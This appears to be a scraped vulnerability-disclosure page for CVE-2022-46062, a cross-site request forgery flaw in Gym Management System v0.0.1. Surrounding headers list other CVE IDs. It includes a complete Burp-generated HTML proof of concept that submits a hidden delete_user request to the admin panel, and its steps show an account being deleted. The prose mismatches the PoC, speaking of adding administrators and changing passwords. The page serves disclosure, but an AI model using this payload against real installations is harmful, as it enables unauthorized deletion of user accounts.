CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Gym Management System v0.0.1 is vulnerable to Cross Site Request Forgery (CSRF).

Permalink

**delete\_user****Description**

Gym Management System has a vulnerability, Cross-site request forgery(CSRF).

This vulnerability may cause the modification of personal information such as administrator password. To exploit this vulnerability, a constructed HTML file needs to be opened.

**Exploit**

1.Login to admin panel -> View Users -> Delete.

2.Build a request package to add administrator information.

<html\>
  <!\-- CSRF PoC \- generated by Burp Suite Professional \--\>
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <form action\="http://localhost/MyGym/admin/index.php"\>
      <input type\="hidden" name\="delete&#95;user" value\="3" /\>
      <input type\="submit" value\="Submit request" /\>
    </form\>
  </body\>
</html\>

3.See that there are currently two users

4.Click on the constructed web page.

    http://localhost/MyGym/csrf.html
    

5.The account was successfully deleted

Headline

CVE-2022-46062: CVE/delete_user.md at master · rdyx0/CVE

CVE: Latest News